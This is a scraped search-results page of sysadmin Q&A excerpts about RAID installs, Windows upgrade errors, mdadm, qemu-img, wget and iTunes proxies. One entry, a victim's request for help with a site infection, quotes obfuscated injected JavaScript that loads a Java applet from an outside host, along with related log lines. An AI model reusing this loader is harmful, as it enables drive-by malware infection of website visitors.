Search Results

Search found 19975 results on 799 pages for 'disk queue length'.

Page 623/799 | < Previous Page | 619 620 621 622 623 624 625 626 627 628 629 630  | Next Page >

  • Error 0x80300001 Installing Windows Server 2008 R2 64bit on FastTrak TX4660 RAID volume

    - by Konstantin Boyandin
    I am trying to install Windows Server 2008 R2 Enterprise 64bit on the following hardware: motherboard Intel DBS1200BTL Promise FastTrak TX4660 RAID controller 4 disks set up in two RAID1 arrays (handled by FastTrak) I am trying to install Windows so it would boot from RAID1 volume created with the FastTrak controller. The installation goes as in the manual, I insert the disk with the driver, select 'Browse' and specify the correct driver, it finds all the RAID arrays but notifies me that error 0x80300001 happened, Windows can't be installed on the mentioned RAID volumes, since they may not be bootable (even though the target RAID volume is the first in boot options list). If I proceed with the installation, Windows copies and unpacks itself, performs other standard actions after that. After the computer is restarted, it won't boot (Windows Boot Manager appears in the boot devices list; however, neither it nor the RAID volume itself does not boot). Is it a known problem? I can attach the boot disks to the motherboard and use its RAID capabilities instead, but I'd prefer FastTrak ones. Driver version is 1.3.0.4. Thanks.

    Read the article

  • windows 8.1 upgrade fails with error code 0xc1900101-0x20017

    - by cmorse
    I just tried to install windows 8.1 on my laptop, but it fails to install with the message: Sorry we couldn't complete the update to Windows 8.1. We restored your previous version of Windows to this PC 0xC1900101 - 0x20017 It looks like on the first boot that the laptop is going to the PC restore screen (it asks what kind of keyboard I have, and then what repair optins I would like to take). Thus far I have just been selecting "Continue to windows 8." I'm running a Lenovo x220i tablet. I've got 43GB of free disk space. It installed just fine on my desktop. The primary difference between the two machines is that the desktop has media center install, and isn't using TrueCrypt. Full WindowsUpdate.log http://pastebin.com/hGmAW4Q1 Most important portion of WindowsUpdate.log: 2013-10-17 10:41:06:671 964 694 Agent ************* 2013-10-17 10:41:06:671 964 694 Agent ** START ** Agent: Finding updates [CallerId = AutomaticUpdates] 2013-10-17 10:41:06:671 964 694 Agent ********* 2013-10-17 10:41:06:671 964 694 Agent * Online = No; Ignore download priority = No 2013-10-17 10:41:06:671 964 694 Agent * Criteria = "IsInstalled=0 and DeploymentAction='Installation' or IsPresent=1 and DeploymentAction='Uninstallation' or IsInstalled=1 and DeploymentAction='Installation' and RebootRequired=1 or IsInstalled=0 and DeploymentAction='Uninstallation' and RebootRequired=1" 2013-10-17 10:41:06:671 964 694 Agent * ServiceID = {7971F918-A847-4430-9279-4A52D1EFE18D} Third party service 2013-10-17 10:41:06:671 964 694 Agent * Search Scope = {Machine & All Users} 2013-10-17 10:41:06:671 964 694 Agent * Caller SID for Applicability: S-1-5-18 2013-10-17 10:41:07:233 964 870 Report REPORT EVENT: {AD47FBDC-F7F9-4E7F-BAF4-DBA3784C7101} 2013-10-17 10:41:06:436-0600 1 202 [AU_REBOOT_COMPLETED] 102 {00000000-0000-0000-0000-000000000000} 0 0 AutomaticUpdates Success Content Install Reboot completed. 2013-10-17 10:41:07:233 964 870 Report REPORT EVENT: {8D4E7A67-9526-4702-A897-5BE5F97497AF} 2013-10-17 10:41:06:639-0600 1 204 [AGENT_INSTALLING_FAILED_POST_REBOOT] 101 {8951E70D-4332-4F7C-B92D-D9362E384959} 1 c1900101 WSAcquisition Failure Content Install Installation Failure Post Reboot. 2013-10-17 10:41:07:249 964 870 Report CWERReporter::HandleEvents - WER report upload completed with status 0x8 2013-10-17 10:41:07:249 964 870 Report WER Report sent: 7.8.9200.16715 0xc1900101(0x20017) 8951E70D-4332-4F7C-B92D-D9362E384959 Install 101 Unmanaged 2013-10-17 10:41:07:249 964 870 Report CWERReporter finishing event handling. (00000000)

    Read the article

  • Remove Kernel Lock from Unmounted Mass Storage USB Device from the Command Line in Linux

    - by Casey
    I've searched high and low, and can't figure this one out. I have a older Olympus Camera (2001 or so). When I plug in the USB connection, I get the following log output: $ dmesg | grep sd [20047.625076] sd 21:0:0:0: Attached scsi generic sg7 type 0 [20047.627922] sd 21:0:0:0: [sdg] Attached SCSI removable disk Secondly, the drive is not mounted in the FS, but when I run gphoto2 I get the following error: $ gphoto2 --list-config *** Error *** An error occurred in the io-library ('Could not lock the device'): Camera is already in use. *** Error (-60: 'Could not lock the device') *** What command will unmount the drive. For example in Nautilus, I can right click and select "Safely Remove Device". After doing that, the /dev/sg7 and /dev/sdg devices are removed. The output of gphoto2 is then: # gphoto2 --list-config /Camera Configuration/Picture Settings/resolution /Camera Configuration/Picture Settings/shutter /Camera Configuration/Picture Settings/aperture /Camera Configuration/Picture Settings/color /Camera Configuration/Picture Settings/flash /Camera Configuration/Picture Settings/whitebalance /Camera Configuration/Picture Settings/focus-mode /Camera Configuration/Picture Settings/focus-pos /Camera Configuration/Picture Settings/exp /Camera Configuration/Picture Settings/exp-meter /Camera Configuration/Picture Settings/zoom /Camera Configuration/Picture Settings/dzoom /Camera Configuration/Picture Settings/iso /Camera Configuration/Camera Settings/date-time /Camera Configuration/Camera Settings/lcd-mode /Camera Configuration/Camera Settings/lcd-brightness /Camera Configuration/Camera Settings/lcd-auto-shutoff /Camera Configuration/Camera Settings/camera-power-save /Camera Configuration/Camera Settings/host-power-save /Camera Configuration/Camera Settings/timefmt Some things I've tried already are sdparm and sg3_utils, however I am unfamiliar with them, so it's possible I just didn't find the right command. Update 1: # mount | grep sdg # mount | grep sg7 # umount /dev/sg7 umount: /dev/sg7: not mounted # umount /dev/sdg umount: /dev/sdg: not mounted # gphoto2 --list-config *** Error *** An error occurred in the io-library ('Could not lock the device'): Camera is already in use. *** Error (-60: 'Could not lock the device') ***

    Read the article

  • What tells initramfs or the Ubuntu Server boot process how to assemble RAID arrays?

    - by Brad
    The simple question: how does initramfs know how to assemble mdadm RAID arrays at startup? My problem: I boot my server and get: Gave up waiting for root device. ALERT! /dev/disk/by-uuid/[UUID] does not exist. Dropping to a shell! This happens because /dev/md0 (which is /boot, RAID 1) and /dev/md1 (which is /, RAID 5) are not being assembled correctly. What I get is /dev/md0 isn't assembled at all. /dev/md1 is assembled, but instead of using /dev/sda2, /dev/sdb2, /dev/sdc2, and /dev/sdd2, it uses /dev/sda, /dev/sdb, /dev/sdc, /dev/sdd. To fix this and boot my server I do: $(initramfs) mdadm --stop /dev/md1 $(initramfs) mdadm --assemble /dev/md0 /dev/sda1 /dev/sdb1 /dev/sdc1 /dev/sdd1 $(initramfs) mdadm --assemble /dev/md1 /dev/sda2 /dev/sdb2 /dev/sdc2 /dev/sdd2 $(initramfs) exit And it boots properly and everything works. Now I just need the RAID arrays to assemble properly at boot so I don't have to manually assemble them. I've checked /etc/mdadm/mdadm.conf and the UUIDs of the two arrays listed in that file match the UUIDs from $ mdadm --detail /dev/md[0,1]. Other details: Ubuntu 10.10, GRUB2, mdadm 2.6.7.1 UPDATE: I have a feeling it has to do with superblocks. $ mdadm --examine /dev/sda outputs the same thing as $ mdadm --examine /dev/sda2. $ mdadm --examine /dev/sda1 seems to be fine because it outputs information about /dev/md0. I don't know if this is the problem or not, but it seems to fit with /dev/md1 getting assembled with /dev/sd[abcd] instead of /dev/sd[abcd]2. I tried zeroing the superblock on /dev/sd[abcd]. This removed the superblock from /dev/sd[abcd]2 as well and prevented me from being able to assemble /dev/md1 at all. I had to $ mdadm --create to get it back. This also put the super blocks back to the way they were.

    Read the article

  • qemu-img: Could not open $FILE

    - by HTTP500
    I received a single-file VMDK from a vendor that has a virtual appliance for a particular product I'm interested in evaluating. We run a KVM solution (Proxmox) so I tried converting the file but on that system qemu-img blows up. (I was able to convert (multipart) VMDK files from bitnami without error.) So I figured I'll just yum install qemu-img on a RHEL 6.3 VM and do it there. But despite the fact that I can file the file just fine when I run qemu-img on it I get this error that it can't open the file: [root@host dir]# file 1.vmdk 1.vmdk: VMware4 disk image [root@host dir]# qemu-img info 1.vmdk qemu-img: Could not open 'vmdk' I've seen some other people post on the interwebs that they've had this problem but none of them seem to have a resolution. Does anyone have any ideas? I have checked the MD5SUM already. EDIT1: [root@host dir]# qemu-img info -f vmdk 1.vmdk qemu-img: Could not open '1.vmdk' EDIT2: Ran strace per suggestion. Not sure what to look for... Here is a possible: ioctl(3, CDROM_DRIVE_STATUS, 0x7fffffff) = -1 ENOTTY (Inappropriate ioctl for device)

    Read the article

  • Downloading a file from the internet with '&' in URL using wget

    - by matt_tm
    Hi, I'm trying to download a file from a URL that looks like this: http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf Within the browser, this link prompts me to download a file called x.pdf irrespective of what DEF is (but 'x.pdf' is the right content). However using wget, I get the following: >wget.exe http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf SYSTEM_WGETRC = c:/progra~1/wget/etc/wgetrc syswgetrc = C:\Program Files\GnuWin32/etc/wgetrc --2011-01-06 07:52:05-- http://pdf.example.com/filehandle.ashx?p1=ABC Resolving pdf.example.com... 99.99.99.99 Connecting to pdf.example.com|99.99.99.99|:80... connected. HTTP request sent, awaiting response... 500 Internal Server Error 2011-01-06 07:52:08 ERROR 500: Internal Server Error. 'p2' is not recognized as an internal or external command, operable program or batch file. This is on a Windows Vista system Edit1 >wget.exe "http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf" SYSTEM_WGETRC = c:/progra~1/wget/etc/wgetrc syswgetrc = C:\Program Files\GnuWin32/etc/wgetrc --2011-02-06 10:18:31-- http://pdf.example.com/filehandle.ashx?p1=ABC&p2=DEF.pdf Resolving pdf.example.com... 99.99.99.99 Connecting to pdf.example.com|99.99.99.99|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4568 (4.5K) [image/JPEG] Saving to: `filehandle.ashx@p1=ABC&p2=DEF.pdf' 100%[======================================>] 4,568 --.-K/s in 0.1s 2011-02-06 10:18:33 (30.0 KB/s) - `filehandle.ashx@p1=ABC&p2=DEF.pdf' saved [4568/4568]

    Read the article

  • Migrating a virtual domain controller for DR exercise

    - by Dips
    Hello gurus, I have a question. I have a requirement where I have a virtual domain controller and I have to migrate it to another virtual server in a different location. It is for test purposes to test out a DR scenario and the test will be deemed successful if the users that authenticate using the production DC can do so in the backup DC. I don't know much about this and thus don't know why it was assigned to me. So any assistance will be greatly appreciated. What I had in mind was: 1) Taking a snapshot of the production server and then restoring it in the other server. But I was told that this is not the suggested way of doing it. I was not told why. Is that right?If a snapshot is to be taken then what is the best way to do it. Any ideas on where I can get the documentation for this? 2) Another way would be to build the test DC from ground up, match it to the specs of production DC and then perform the DR test. Is this a better option? What will be needed to perform such an activity? Where can I find documentation on that? I apologise for the length of this query. As I said I am quite a novice and hope to get a better resolution. Any assistance will be greatly appreciated. Regards,

    Read the article

  • Automount in Ubuntu 9.10

    - by easyrider
    Hi, By default Ubuntu doesn't mount internal NTFS hard drives automatically. A fstab solution not working properly, because of conflicts with the "intelligent" mount system. If I add my hd in fstab and reboot - it will be mounted. But if I go to nautilus, open places panel and click eject button (unmount) and than click on hd again to mount it, I will get an error. In 9.04 to solve this problem you need to modify hal rules in /etc/hal/... preferences.fdi in my case I modified it for only one drive. <device> - <match key="storage.hotpluggable" bool="false"> - <match key="storage.removable" bool="false"> <merge key="storage.automount_enabled_hint" type="bool">false</merge> - <match key="storage.model" string="ST3250310NS"> <merge key="storage.automount_enabled_hint" type="bool">true</merge> </match> </match> </match> </device> But this is not working in 9.10 - devs removed this function from hal to devkit-disk or udev? I don't know. Could you please tell me where automount rules are stored in 9.10? And how to create new rules, and what program controls automount in 9.10?

    Read the article

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by an Cross Site Scripting / XSS / RFI Attack, where I cant find it anywhere in the source of the files and Hashes on files have not been changed according to OSSEC HIDS that I run real time monitoring on all webdirs. The Attack happens on IE9 Only it and appends java script code like beneath, notice that it starts after /html tag closes normally. : scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on file as far as my HIDS says ... but I can see in my Error log, the following... File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee In the Access log, the following IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java Class class.class, yet it still looks like an local call to the server and it was getting an "404 File not found / 504 Gateway Timeout" (attack was blocked by local machine, hence the timeout / not found) Any idea on how to prevent the attack ? Im working on using HTML Purifier, but that might not be the correct idea it seems, according to some replies im getting on their forum :) Kind regards, Steven

    Read the article

  • System Information (msinfo32.exe) Can't Collect Information

    - by ptanne
    I have Windows XP Pro, service pack 1, IE 6 and 32GB of free space, 75GB total. I have had nothing but trouble after trying to install service pack 2 even though I used System Restore. The installation was incomplete and my computer has never been the same. I attempted to install sp2 four or five times and sp3 once, always with the same result. I've tried reinstalling XP Pro but that didn't fix the problem. My XP Pro disk now has a scratch on it and refuses to work. Dell would not replace it stating that my computer was out of warranty. I'm currently trying Reimage which is supposed to return a computer to the original configuration and replace missing or damaged files. Believe it or not, Ripley, it stops in the middle of the operation and, so far, the Reimage techs haven't been able to figure out why. Of the many problems that I still have is that System Information can't collect information. The Help and Support sections that display system info also don't work. Is there some way that I can fix this? I can't afford to throw my computer away, yet. Thank you for listening, Pam Galvin

    Read the article

  • Remote Desktop to Server 2008R2 fails from one particular Win7 client

    - by Jesse McGrew
    I have a VPS running Windows Web Server 2008 R2. I'm able to connect using Remote Desktop from my home PC (Windows 7), personal laptop (Windows 7), and work laptop (Windows XP). However, I cannot connect from my work PC (Windows 7). I receive the error "The logon attempt failed" in the RDP client, and the server event log shows "An account failed to log on" with this explanation: Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Logon Type: 3 Account For Which Logon Failed: Security ID: NULL SID Account Name: username Account Domain: hostname Failure Information: Failure Reason: Unknown user name or bad password. Status: 0xc000006d Sub Status: 0xc0000064 Process Information: Caller Process ID: 0x0 Caller Process Name: - Network Information: Workstation Name: JESSE-PC Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): - Key Length: 0 I can connect from the offending work PC if I start up Windows XP Mode and use the RDP client inside that. The server is part of a domain but my account is local, so I'm logging in using a username of the form hostname\username. None of the clients are part of a domain. The server uses a self-signed certificate, and connecting from home I get a warning about that, but connecting from work I just get the logon error.

    Read the article

  • Re: How can Django/WSGI and PHP share / on Apache?

    - by Bogdan
    in response to: How can Django/WSGI and PHP share / on Apache? Hello, could you please post the complete config file from /sites-available I am having a problem seems like rewrite engine redirects all requests to django, so static and php files are not served and instead i see the django 404 page. If I get rid of rewrite rule then static files and php works. here is my apache config file from /sites-available <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /home/www/django <Directory /> Options +FollowSymLinks ExecCGI Indexes AllowOverride None DirectoryIndex index.php AddHandler wsgi-script .wsgi </Directory> RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ /mysite.wsgi/$1 [QSA,PT,L] ~ and my .wsgi file: import site site.addsitedir('/home/user/.virtualenvs/url.com/lib/python2.6/site-packages') import os, sys path = '/home/www/django' if path not in sys.path: sys.path.append(path) os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings' sys.path.append(path + '/mysite') import django.core.handlers.wsgi _application = django.core.handlers.wsgi.WSGIHandler() import posixpath def application(environ, start_response): # Wrapper to set SCRIPT_NAME to actual mount point. environ['SCRIPT_NAME'] = posixpath.dirname(environ['SCRIPT_NAME']) if environ['SCRIPT_NAME'] == '/': environ['SCRIPT_NAME'] = '' return _application(environ, start_response) the document root directory on disk (/home/www/django) contains php files, images, and the mysite.wsgi file.. thanks for your help

    Read the article

  • Windows NT from vmware to kvm

    - by Luca Rossi
    I'm trying to convert a couple of old Windows NT virtual servers from vmware to KVM. I tried almost all guidelines and how to I found around the web but with no luck. I have the vmware virtual disk: Dlc1.vmdk partitioned image. I converted the vmdk into qcow2 image with the qemu utility and I tried to use it with kvm: kvm -hda test.qemu -vnc :1 -m 750 but I receive "error loading operating system" I also tried with raw partitions I can mount through losetup and kpartx. but nothing changed I also tried to create an brand new image file with: qemu-img create -f qcow2 test.qcow2 2G I partitioned the new image file and I copied the original partition 1 to the new partition 1 with dd: dd if=/dev/mapper/loop1p1 of=/dev/mapper/loop0p1 bs=128M no luck again I also tried with a single unpartitioned file: qemu-img create -f qcow2 test.qcow2 2G and I copied the partition 1 to the new image file: dd if=/dev/mapper/loop0p1 of=test.img bs=128M but when booting, I receive a black screen and the virtual machine hangs. The bootloader is loaded successfully, because I also tried with a GRUB live iso and I receive the same screens and errors. Note that grub sees the Windows setup and give me the boot choice. I have the suspect the problem is that the vmware machine is probably a scsi guest and in centos 6 (my system) scsi emulation is no longer supported. But in that case, where to change in Windows? I'm not so skilled with MS systems. Thank you for the help Luca Rossi

    Read the article

  • How does SELinux affect the /home directory?

    - by Matt Solnit
    Hi everyone. I'm migrating a CentOS 5.3 system from MySQL to PostgreSQL. The way our machine is set up is that the biggest disk partition is mounted to /home. This is out of my control and is managed by the hosting provider. Anyway, we obviously want the database files to be on /home for this reason. With MySQL, we did the following: Edited my.cnf and changed the datadir setting to /home/mysql Added a new "File type" policy record (I hope I'm using the right terminology) to set /home/mysql(/.*)? to mysqld_db_t Ran restorecon -R /home/mysql to assign the labels and everything was good. With PostgreSQL, however, I did the following: Edited /etc/init.d/postgresql and changed the PGDATA and PGLOG variables to /home/pgsql/data and /home/pgsql/pgstartup.log, respectively Added a new policy record to set /home/pgsql/pgstartup.log to postgresql_log_t Added a new policy record to set /home/pgsql/data(/.*)? to postgresql_db_t Ran restorecon -R /home/pgsql to assign the labels At this point, I still cannot start PostgreSQL. pgstartup.log says: # cat pgstartup.log postmaster cannot access the server configuration file "/home/pgsql/data/postgresql.conf": Permission denied The weird thing is that I don't see any messages related to this in /var/log/messages or /var/log/secure, but if I turn off SElinux, then everything works. I made sure all the permissions are correct (600 for files and 700 for directories), as well as the ownership (postgres:postgres). Can anyone tell me what I am doing wrong? I'm using the Yum repository from commandprompt.com, version 8.3.7. EDIT: The reason my question specifically mentions the /home directory is that if I go through all these steps for any other directory, e.g. /var/lib/pgsql2 or /usr/local/pgsql, then it works as expected.

    Read the article

  • Everything on hard drive suddenly vanished without explanation, but the drive seems otherwise functional

    - by user160705
    Windows 7 Ultimate x64 Custom-built desktop I have a new desktop that I built a few months ago that has a four-year-old WD hard drive and a two-year-old drive. I had set it up so that the newer drive had Windows and most of my files on it while the older drive had my music library, some movies and games, and a backup of all of my documents. About a month ago, I installed some new case fans and, in the process, I temporarily unplugged my hard drive (while the computer was off of course - I took all the necessary precautions) for wire management. I plugged it back in, and didn't really think anything of it. At around that time, however, I noticed that my older hard drive wasn't showing up in Windows Explorer anymore but I didn't really have time to check into it (I had just started college) and I'm finally getting a chance to now. That drive doesn't show up in Windows Explorer at all but it does show up in Disk Management. That screen shows the following: http://puu.sh/17mMN Any idea what happened? Is there any way to recover my files? Thanks in advance for your help! EDIT: The music and games and stuff used to be on "Disc 1", the 465.71 GB of what is now showing as unallocated space.

    Read the article

  • Chunking large rsync transfers?

    - by Gabe Martin-Dempesy
    We use rsync to update a mirror of our primary file server to an off-site colocated backup server. One of the issues we currently have is that our file server has 1TB of mostly smaller files (in the 10-100kb range), and when we're transferring this much data, we often end up with the connection being dropped several hours into the transfer. Rsync doesn't have a resume/retry feature that simply reconnects to the server to pickup where it left off -- you need to go through the file comparison process, which ends up being very length with the amount of files we have. The solution that's recommended to get around is to split up your large rsync transfer into a series of smaller transfers. I've figured the best way to do this is by first letter of the top-level directory names, which doesn't give us a perfectly even distribution, but is good enough. I'd like to confirm if my methodology for doing this is sane, or if there's a more simple way to accomplish the goal. To do this, I iterate through A-Z, a-z, 0-9 to pick a one character $prefix. Initially I was thinking of just running rsync -av --delete --delete-excluded --exclude "*.mp3" "src/$prefix*" dest/ (--exclude "*.mp3" is just an example, as we have a more lengthy exclude list for removing things like temporary files) The problem with this is that any top-level directories in dest/ that are no longer present present on src will not get picked up by --delete. To get around this, I'm instead trying the following: rsync \ --filter 'S /$prefix*' \ --filter 'R /$prefix*' \ --filter 'H /*' \ --filter 'P /*' \ -av --delete --delete-excluded --exclude "*.mp3" src/ dest/ I'm using the show and hide over include and exclude, because otherwise the --delete-excluded will delete anything that doesn't match $prefix. Is this the most effective way of splitting the rsync into smaller chunks? Is there a more effective tool, or a flag that I've missed, that might make this more simple?

    Read the article

  • Subversion and Quickbooks Files

    - by Jorge Fernandez
    I currently have a large problem on one of the file servers I manage for an Accounting Firm. Quickbooks has a tendency to create multiple files of the same thing over and over to prevent data loss. This is a good thing when you handle just a few files. But at an accounting firm it becomes a problem. Some of the older clients have 5-10 files in their respective folders, each with a different cut off date. Because of user error some of these file aren't labeled properly with their correct cutoff dates. This is where Subversion came to mind. Using the revision system would allow for 1 file to be master and have all of its revisions. Has anyone ever tried this with Quickbooks files? I've only used SVN with code for applications making each file size much smaller. How does SVN stand up with larger files like 10-25MB? I'm not exactly sure how SVN handles revisions - does it keep a duplicate of the files and duplicates the disk space space needed?

    Read the article

  • SAN performance issues storing SQL Server tempdb on a SAN that's being backed up

    - by user42724
    I'm afraid I don't know much about SAN's so please forgive my lack of detail or technical terms. As a developer I've just completed and put on an existing production system a new application but it would appear to have tipped the scales regarding the performance of the backups being taken from the SAN. As I understand it there's a mirror of the SAN being taken usually constantly at the block-level. However, there seem to be so many new writes to the disk that the SAN mirroring/backup process can no longer keep up. I believe I've narrowed this down to SQL Servers tempdb which exists on a drive that contributes the largest portion of the problem! In fact I think tempdb has be contributing the largest portion of the issues all along regardless of my application! My question therefore is whether the tempdb should ever be mirrored or backed on the SAN and whether anyone else has gone through this sort of pain already? I'm wondering whether it's a best practise to make sure that tempdb is never mirrored on a SAN simply because any writes to it don't need to be saved. This also raises a slightly connected question - is it better to rely on SQL Servers built-in database backups tools (DB in full-recovery mode with full/differential and transaction log backups) or, as is the case with our application, SQL server is in simple recovery mode and never backed up since the SAN is mirrored and backed up? Many thanks

    Read the article

  • Can ping IP address and nslookup hostname but cannot ping hostname

    - by jao
    On a windows 2003 server I can nslookup www.google.com which returns Server: localhost Address: 127.0.0.1 Non-authoritative answer: Name: www.l.google.com Addresses: 74.125.79.104, 74.125.79.147, 74.125.79.99 Aliases: www.google.com I can then ping 74.125.79.104: Pinging 74.125.79.104 with 32 bytes of data: Reply from 74.125.79.104: bytes=32 time=16ms TTL=54 Reply from 74.125.79.104: bytes=32 time=32ms TTL=54 Reply from 74.125.79.104: bytes=32 time=15ms TTL=54 Reply from 74.125.79.104: bytes=32 time=15ms TTL=54 Ping statistics for 74.125.79.104: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 15ms, Maximum = 32ms, Average = 19ms But I cannot ping www.google.com: Ping request could not find host www.google.com. Please check the name and try again. (this one is different from the other question in that this one has a TLD, it is not a local domain.) Update: I am running a dns server at localhost (127.0.0.1). Even when I change it to use for example opendns, it still can nslookup hostname and ping ip address, but not ping hostname. So what is wrong? Update 2: here is the ipconfig /all result: Windows IP Configuration Host Name . . . . . . . . . . . . : SERVER Primary Dns Suffix . . . . . . . : NETWORK.local Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : NETWORK.local Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2 Physical Address. . . . . . . . . : 00-0F-1F-56-3B-AA DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.7.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.7.1 DNS Servers . . . . . . . . . . . : 127.0.0.1 Update 3: Thanks everyone for their help and suggestions. I appreciate that. Ipconfig /flushdns returns: Sucessfully flushed the DNS resolver cache Ipconfig /displaydns returns: 2.7.168.192.in-addr.arpa ---------------------------------------- Record Name . . . . . : 2.7.168.192.in-addr.arpa. Record Type . . . . . : 12 Time To Live . . . . : 0 Data Length . . . . . : 4 Section . . . . . . . : Answer PTR Record . . . . . : webserver.mydomainname.com 1.0.0.127.in-addr.arpa ---------------------------------------- Record Name . . . . . : 1.0.0.127.in-addr.arpa. Record Type . . . . . : 12 Time To Live . . . . : 0 Data Length . . . . . : 4 Section . . . . . . . : Answer PTR Record . . . . . : localhost Update 4: Wireshark shows the following: 3 11.540542 208.67.220.220 192.168.7.2 DNS Standard query response A 74.125.79.99 A 74.125.79.104 A 74.125.79.147 6 42.056794 192.168.7.2 192.168.7.255 NBNS Name query NB WWW.GOOGLE.COM<00> which is weird: when I ping, it sends a packet to 192.168.7.255 instead of asking the DNS server for an address

    Read the article

  • Getting at fsid under Linux? Or an alternate way of identifying filesystems?

    - by larsks
    In an environment with automounted home directories, such that the same filesystem exported by a fileserver may be mounted multiple times on the client, I would like to authoritatively be able to identify whether two mountpoints are in fact the same filesystem. That is, if the remote server exports: /home And the local client has: # mount fileserver:/home/l/lars on /home/lars type nfs (rw...) fileserver:/home/b/bob on /home/bob type nfs (rw...) I am looking for a way to identify that both /home/lars and /home/bob are in fact the same filesystem. In theory this is what the fsid result of the statvfs structure is for, but in all cases, for both local and remote filesystems, I am finding that the value of this structure member is 0. Is this some sort of client-side issue? Or do most modern NFS servers simply decline to provide a useful fsid? The end goal of all of this is to robustly interpret the output from the quota command for NFS filesystems. For example, given the example above, running quota as myself may return something like: Disk quotas for user lars (uid 6580): Filesystem blocks quota limit grace files quota limit grace otherserver:/vol/home0/a/alice 12 52428800 52428800 4 4294967295 4294967295 fileserver:/home/l/lars 9353032 9728000 10240000 124018 0 0 ...the problem here being that there exists a quota for me on otherserver which is visible in the results of the quota command, even though my home directory is actually on a different device. My plan was to look up the fsid for each mountpoint listed in the quota output and check to see if it matched the fsid associated with my home directory. It looks like this won't work, so...any suggestions?

    Read the article

  • Blue screen of death while installing any Adobe Air application

    - by Gaurav Sharma
    Whenever I try to install an Air application I get a Blue Screen and then my system restarts. I cannot even take a screenshot of it. This happens with every air application I try to install. I also searched for the same on Adobe forums and found the same problem being faced by someone else. His problem was resolved by uninstalling a software named "Folder Lock". I searched my hard disk for this software and found one, so I deleted that software (shift+delete) and removed all it's traces from registry too but that still doesn't solved the problem. I also tried disabling the antivirus software and then install the air application but this also didn't helped. Here is the screenshot of the BSOD. I was able to install air applications earlier, but now I can't. Anybody having same sort of problem. One colleague of mine is also having the same problem. Please help me out. My system's config is as follows: Windows XP Home sp3 Flash Builder 4, with SDK 4.1, 3.5 installed in it. Adobe Air v 2.5 1.5 GB RAM 1.66 MHz processor Thanks

    Read the article

  • How do I add a VMware ESXi Host to Microsoft Virtual Machine Manager?

    - by user63250
    I am trying to manage virtual machines running on a VMware ESXi host using Microsoft System Center Virtual Machine Manager. I was able to add the ESXi machine using the "Add VMware VirtualCenter server" option, but can't access any of the VMs on the datastore associated with this ESXi server. The datastore of the ESXi box is showing up with the correct name, but it won't let me see any of the VMs that have already been created; I get "There are no virtual machines on this host." Because I couldn't get any of the existing virtual machines to show up, I tried creating some new ones. When using VMM to connect to ESXi and create new VMs, I get the following error messages in the "rating explanation" section: The virtualization software on the selected host does not support virtual hard disks on an IDE bus. and The virtualization software on the host XXXXXX does not support the creation of dynamic virtual hard disk. Any ideas on why I can't manage existing machines and why I can't create new ones? The existing machines were created in vSphere. I should note that the ESXi server and the server running SCVMM are both on the same domain. I should also note that although the ESXi box has been added as a VirtualCetner server, when I try to add it through the "Add Host" option, I get an error message saying "Virtual Machine Manager cannot complete the VirtualCenter action on server EXSi because of the following error: The operation is not supported on the object."

    Read the article

  • iTunes' clandestine proxy settings

    - by pilcrow
    Problem: One user's iTunes consults a defunct HTTP proxy, but only for iTunes Store HTTP requests -- other iTunes web requests are unproxied. How do I dismiss this spurious proxy setting? Background: It's not as easy as Internet Options. Years ago my network had a mandatory HTTP proxy at 172.31.1.1:8080. When we switched to the 192.168.1/24 space and eliminated the proxy, this user's iTunes -- the only iTunes user at the time -- could no longer contact the iTunes Store, an operation which fails with "unknown error -9808". This has been the case through several iTunes.exe upgrades over the years and prevents, among other things, activation of a new or newly upgraded iPhone. wireshark and TCPView confirm that this user's iTunes.exe is attempting to contact the long-defunct http proxy when attempting to reach the iTunes Store, but is otherwise unproxied. Curious details: No other iTunes.exe HTTP traffic for this user is affected -- iTunes can successfully make HTTP chatter at Apple's servers. No other web traffic at all is proxied, whether this user or others, iTunes or browser, etc. I cannot find the spurious proxy setting anywhere in the registry nor on disk, though perhaps I haven't thought of every place to look and every format to look 